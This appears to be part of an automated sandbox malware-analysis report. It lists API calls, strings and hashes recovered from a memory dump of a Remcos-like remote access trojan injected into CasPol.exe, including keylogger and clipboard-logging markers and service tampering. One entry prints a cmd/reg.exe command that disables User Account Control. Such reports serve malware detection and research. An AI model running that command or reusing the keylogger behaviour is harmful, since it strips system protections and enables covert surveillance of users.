                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 493672254-0
                                                                                                            • Opcode ID: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                                                                                                            • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                                            • Opcode Fuzzy Hash: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                                                                                                            • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                                            • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3852720340-0
                                                                                                            • Opcode ID: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                                                                                                            • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                                            • Opcode Fuzzy Hash: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                                                                                                            • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                                            • _free.LIBCMT ref: 00446EF6
                                                                                                            • _free.LIBCMT ref: 00446F1E
                                                                                                            • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                                                            • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                                            • _abort.LIBCMT ref: 00446F3D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 3160817290-0
                                                                                                            • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                            • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                                            • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                            • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            • Opcode ID: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                                                                                                            • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                                            • Opcode Fuzzy Hash: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                                                                                                            • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            • Opcode ID: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                                                                                                            • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                                            • Opcode Fuzzy Hash: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                                                                                                            • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            • Opcode ID: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                                                                                                            • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                                            • Opcode Fuzzy Hash: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                                                                                                            • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                                                            APIs
                                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Enum$InfoQueryValue
                                                                                                            • String ID: [regsplt]$DG
                                                                                                            • API String ID: 3554306468-1089238109
                                                                                                            • Opcode ID: 2c0c651cac9b710f1168a485f464d1fc739dd231b9536622f25106be1a0f90b4
                                                                                                            • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                                            • Opcode Fuzzy Hash: 2c0c651cac9b710f1168a485f464d1fc739dd231b9536622f25106be1a0f90b4
                                                                                                            • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                            APIs
                                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                            • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                                            • API String ID: 2974294136-753205382
                                                                                                            • Opcode ID: aa5d334bcd1812922a4ad084044b3d1b343442b21def6a42fbfd5f9bd3c8e3e6
                                                                                                            • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                                            • Opcode Fuzzy Hash: aa5d334bcd1812922a4ad084044b3d1b343442b21def6a42fbfd5f9bd3c8e3e6
                                                                                                            • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                                            APIs
                                                                                                            • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                            • wsprintfW.USER32 ref: 0040A905
                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EventLocalTimewsprintf
                                                                                                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                            • API String ID: 1497725170-248792730
                                                                                                            • Opcode ID: dbc4a2a758c63c1510e987d26333f1bba1f1b77e24aef8622eec758640aef2d7
                                                                                                            • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                                            • Opcode Fuzzy Hash: dbc4a2a758c63c1510e987d26333f1bba1f1b77e24aef8622eec758640aef2d7
                                                                                                            • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                            • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateHandleSizeSleep
                                                                                                            • String ID: `AG
                                                                                                            • API String ID: 1958988193-3058481221
                                                                                                            • Opcode ID: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
                                                                                                            • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                            • Opcode Fuzzy Hash: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
                                                                                                            • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                            APIs
                                                                                                            • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                            • GetLastError.KERNEL32 ref: 0041CA91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                            • String ID: 0$MsgWindowClass
                                                                                                            • API String ID: 2877667751-2410386613
                                                                                                            • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                            • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                                            • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                            • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                            Strings
                                                                                                            • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                            • API String ID: 2922976086-4183131282
                                                                                                            • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                            • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                                            • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                            • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                                            APIs
                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002), ref: 004425F9
                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000), ref: 0044262F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                            • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                            • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                                            • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                            • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                                            APIs
                                                                                                            • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                                            • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                                            • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValue
                                                                                                            • String ID: pth_unenc$BG
                                                                                                            • API String ID: 1818849710-2233081382
                                                                                                            • Opcode ID: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
                                                                                                            • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                            • Opcode Fuzzy Hash: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
                                                                                                            • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                            APIs
                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                            • String ID: KeepAlive | Disabled
                                                                                                            • API String ID: 2993684571-305739064
                                                                                                            • Opcode ID: c920db2117b9ebb21b6f907faadff67bbda6cb2284db632f5ba91f60e6129f46
                                                                                                            • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                                            • Opcode Fuzzy Hash: c920db2117b9ebb21b6f907faadff67bbda6cb2284db632f5ba91f60e6129f46
                                                                                                            • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                                            APIs
                                                                                                            • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                                                            • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                                                            Strings
                                                                                                            • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                            • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                            • API String ID: 3024135584-2418719853
                                                                                                            • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                            • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                            • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                            • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: GetCursorInfo$User32.dll$`#v
                                                                                                            • API String ID: 1646373207-1032071883
                                                                                                            • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                            • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                                                                            • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                            • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                                                                                                            • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                                                            • Opcode Fuzzy Hash: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                                                                                                            • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                                                            APIs
                                                                                                              • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                            • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                            • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 3525466593-0
                                                                                                            • Opcode ID: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                                                                                                            • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                                            • Opcode Fuzzy Hash: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
